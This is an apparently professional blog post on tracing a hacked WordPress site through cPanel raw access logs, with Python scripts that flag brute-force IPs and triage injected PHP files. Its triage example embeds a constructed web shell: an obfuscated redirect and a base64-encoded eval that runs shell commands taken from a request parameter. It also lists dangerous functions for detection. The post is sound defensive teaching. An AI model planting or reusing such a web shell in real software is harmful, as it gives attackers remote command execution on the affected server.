How to Fix Hacked Site: Checking raw access logs

Most web hosting environments provide a way to review what happened on a site in raw log format. From these logs we can see who connected to the site and when, their IP address, which files or URLs they requested, and so on.

This post shows how to use raw access logs to identify unusual activity on a site. If a website has been hacked or is behaving strangely, the logs can help track down bad IPs, malware buried in the files, unknown scripts being executed, trojans and so on. The tips here are based on a cPanel hosting environment, but other hosting platforms have similar ways of logging web server events.

In cPanel hosting, the raw access logs can be downloaded from the “Raw Access” menu under the Metrics section. Once downloaded, extract the gzip file and give it a .txt extension so it opens easily in any text editor; we use Notepad++ for this kind of troubleshooting. The case study below comes from an external client whose WordPress site had been compromised for months.

Some of the information we can get from the log data:

Marker A – Brute-force bot attack from a single foreign IP address hitting /wp-login.php at least 4-5 times per second. This IP address needs to be blacklisted. Note that a single IP is easy to block, but distributed brute-force attacks rotate through many addresses, so rate-limiting /wp-login.php itself is worth doing as well.
Marker B – Search engine crawling by Yandex, Russia's largest search provider. This does not harm the site, but if you don't need it there are several ways to block a particular search bot from crawling your pages (robots.txt for well-behaved crawlers, or a server rule keyed on the User-Agent). Keep in mind that the User-Agent string can be forged; major search engines publish a reverse-DNS method for verifying that a crawler IP really belongs to them.

Further down, we found something more interesting than the brute-force bot still trying to guess the password.

Marker C – The brute-force login bot, still trying…

Marker D – An unusually large number of requests to a db.php file inside one of the theme folders. According to the cPanel File Manager, this theme is one of dozens that are installed but not in use. The filename is also unlike anything found in a normal WordPress theme, and a theme file should never be requested directly in this way.
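The three findings above (the per-second brute force of Marker A, the crawler traffic of Marker B and the direct hits on a theme PHP file of Marker D) can be pulled out of a raw access log automatically instead of by scrolling in Notepad++. The script below is an added example, not code from the original post or from cPanel: it parses Apache "combined" log lines (the format a cPanel Raw Access log uses), flags IPs that POST to /wp-login.php several times within one second, tallies requests from recognised search bots by User-Agent token, and lists every PHP file under /wp-content/themes/ that was requested directly together with the IPs that hit it. The log lines, IP addresses, timestamps, theme name and user agents are constructed for the example and are not from the client's real log; the threshold of four requests per second is an assumption you can tune.

```python
import re
from collections import Counter, defaultdict

# Constructed sample lines in Apache "combined" log format, which is what a
# cPanel Raw Access log contains. IPs, timestamps, theme name and user agents
# are invented for this example; they are not from the client's real log.
SAMPLE_LOG = """\
203.0.113.45 - - [10/Mar/2019:14:02:11 +0000] "POST /wp-login.php HTTP/1.1" 200 4128 "-" "Mozilla/5.0"
203.0.113.45 - - [10/Mar/2019:14:02:11 +0000] "POST /wp-login.php HTTP/1.1" 200 4128 "-" "Mozilla/5.0"
203.0.113.45 - - [10/Mar/2019:14:02:11 +0000] "POST /wp-login.php HTTP/1.1" 200 4128 "-" "Mozilla/5.0"
203.0.113.45 - - [10/Mar/2019:14:02:11 +0000] "POST /wp-login.php HTTP/1.1" 200 4128 "-" "Mozilla/5.0"
203.0.113.45 - - [10/Mar/2019:14:02:11 +0000] "POST /wp-login.php HTTP/1.1" 200 4128 "-" "Mozilla/5.0"
5.255.250.10 - - [10/Mar/2019:14:02:12 +0000] "GET /about/ HTTP/1.1" 200 9023 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
198.51.100.7 - - [10/Mar/2019:14:02:13 +0000] "POST /wp-content/themes/oldtheme/db.php HTTP/1.1" 200 112 "-" "Mozilla/5.0"
198.51.100.8 - - [10/Mar/2019:14:02:14 +0000] "GET /wp-content/themes/oldtheme/db.php?cmd=1 HTTP/1.1" 200 112 "-" "curl/7.64.0"
192.0.2.20 - - [10/Mar/2019:14:02:15 +0000] "GET /wp-content/themes/twentynineteen/style.css HTTP/1.1" 200 3510 "https://example.com/" "Mozilla/5.0"
192.0.2.20 - - [10/Mar/2019:14:02:16 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "https://example.com/wp-login.php" "Mozilla/5.0"
"""

# Apache combined format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# User-Agent tokens that separate routine indexing traffic (Marker B) from attacks.
# Remember the header is client-controlled; verify real crawlers by reverse DNS.
KNOWN_BOTS = ("Googlebot", "bingbot", "YandexBot", "Baiduspider", "DuckDuckBot")

# A browser never needs to request a theme's PHP files directly; WordPress includes
# them server-side. Direct hits on such a file are what Marker D looked like.
THEME_PHP_RE = re.compile(r"^/wp-content/themes/[^/]+/.+\.php$")


def parse_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            e = m.groupdict()
            e["path"] = e["path"].split("?", 1)[0]   # drop the query string
            entries.append(e)
    return entries


def brute_force_ips(entries, threshold=4):
    """IPs that POST to /wp-login.php at least `threshold` times within one second.

    The log timestamp has one-second resolution, so (ip, time) buckets requests
    per second; the peak bucket per IP is compared against the threshold.
    """
    per_second = Counter(
        (e["ip"], e["time"]) for e in entries
        if e["method"] == "POST" and e["path"] == "/wp-login.php"
    )
    peak = defaultdict(int)
    for (ip, _), n in per_second.items():
        peak[ip] = max(peak[ip], n)
    return {ip: n for ip, n in peak.items() if n >= threshold}


def crawler_hits(entries):
    """Count requests per recognised search-engine bot, by User-Agent token."""
    hits = Counter()
    for e in entries:
        for bot in KNOWN_BOTS:
            if bot in e["ua"]:
                hits[bot] += 1
                break
    return dict(hits)


def theme_php_hits(entries):
    """Map each directly requested theme PHP file to the set of IPs that hit it."""
    hits = defaultdict(set)
    for e in entries:
        if THEME_PHP_RE.match(e["path"]):
            hits[e["path"]].add(e["ip"])
    return dict(hits)


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    print("brute force:", brute_force_ips(entries))
    print("crawlers:", crawler_hits(entries))
    print("theme PHP hits:", theme_php_hits(entries))
```

Run it against a real log by replacing SAMPLE_LOG with the contents of the extracted Raw Access file. The IPs returned by `theme_php_hits` are the external callers of the injected file and belong on the blocklist alongside the brute-force source; the file paths it returns are the ones to inspect next in the File Manager.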

We go back into the cPanel File Manager to inspect this suspicious file.

There are a bunch of unused WordPress themes, and from the log we found that one of them is vulnerable and has had a malware file injected into it. *Please keep your themes up to date and delete any unused themes and plugins from your site.

Using the cPanel File Manager we open db.php. It contains code that belongs to a Joomla installation, not to WordPress, and among that code there are encoded lines that we have to decode to learn their purpose.

Marker E – This file has nothing to do with WordPress. Bad file.

Marker F – Encoded command/URL. Legitimate theme or plugin code has no reason to obfuscate its strings; encoded commands and URLs in a file like this point to bad intentions.

We copied the encoded string and decoded it with an online URL decoder/encoder tool, and the result shows where things go wrong: the malware redirects visitors of the site to another URL, and at the same time the file is being called from various external IP addresses to execute other unknown commands. Paste only the encoded string into an online tool, never the whole file; decoding locally is preferable, and the external IPs calling the file belong on the blocklist along with the brute-force source.
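Decoding one string in a browser tool works for a single file, but a site that has been compromised for months usually has several injected files, so it pays to triage them the same way every time. The script below is an added example and is not the post's own method: it scans PHP source for the two obfuscation patterns this case showed (percent-encoded runs and literals passed to base64_decode()), decodes them, lists the dangerous PHP functions the file calls both before and after decoding, and reports whether the file sets a Location header, which is how the redirect in this case was done. The PHP fragment it runs on is constructed in the style of the injected db.php and is hypothetical content, not the client's actual file; the list of suspicious functions is an assumption you can extend.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Constructed sample in the style of the injected db.php described above.
# Hypothetical content for the example, not the client's actual file.
SAMPLE_PHP = r"""<?php
$u = urldecode('%68%74%74%70%3a%2f%2f%65%78%61%6d%70%6c%65%2e%69%6e%76%61%6c%69%64%2f%67%6f');
if (!isset($_GET['cmd'])) { header('Location: ' . $u); exit; }
eval(base64_decode('ZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7'));
"""

# PHP functions that legitimate theme code rarely needs but injected code leans on.
# Assumed list; extend it for your environment.
SUSPICIOUS_CALLS = (
    "eval", "assert", "create_function", "base64_decode", "gzinflate",
    "gzuncompress", "str_rot13", "urldecode", "system", "exec",
    "shell_exec", "passthru",
)

URL_ENC_RE = re.compile(r"(?:%[0-9A-Fa-f]{2}){4,}")   # runs of percent-encoded bytes
B64_ARG_RE = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")
CALL_RE = re.compile(r"\b(" + "|".join(SUSPICIOUS_CALLS) + r")\s*\(")
REDIRECT_RE = re.compile(r"header\(\s*['\"]Location:", re.IGNORECASE)


def decode_url_strings(src):
    """Return every run of percent-encoded bytes found in src, decoded."""
    return [unquote(m) for m in URL_ENC_RE.findall(src)]


def decode_base64_args(src):
    """Decode string literals passed directly to base64_decode(); skip non-text payloads."""
    out = []
    for arg in B64_ARG_RE.findall(src):
        try:
            out.append(base64.b64decode(arg, validate=True).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue
    return out


def suspicious_calls(src):
    """Sorted, de-duplicated names of suspicious functions called in src."""
    return sorted(set(CALL_RE.findall(src)))


def triage(src):
    """One-pass report: what the file calls, what it hides, and whether it redirects."""
    payloads = decode_base64_args(src)
    return {
        "calls": suspicious_calls(src),
        "urls": decode_url_strings(src),
        "base64": payloads,
        # Calls that only appear once a payload is decoded (the real intent).
        "decoded_calls": sorted({c for p in payloads for c in suspicious_calls(p)}),
        "redirect": bool(REDIRECT_RE.search(src)),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_PHP).items():
        print(f"{key}: {value}")
```

On the sample, the percent-encoded string decodes to the redirect target, and the base64 literal decodes to a one-line command runner keyed on the cmd parameter, which matches the two behaviours seen in the log: visitors redirected, and external IPs calling the file with commands. Run `triage` over every .php file under wp-content to find the other infections rather than stopping at the first one.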

Summary:

  • This is one of the hijacking methods found on this particular project. Several more infections with different purposes and origins were detected within the same website.
  • Always keep your theme files up to date and delete unused themes and plugins.
  • Apply security precautions or plugins to your WordPress site. IP blocking matters for stopping the daily bot attacks.
  • Monitor site activity and back up frequently. The earlier the detection, the less the damage.

Website security services and hacked website troubleshooting: please contact eWallz OPS.
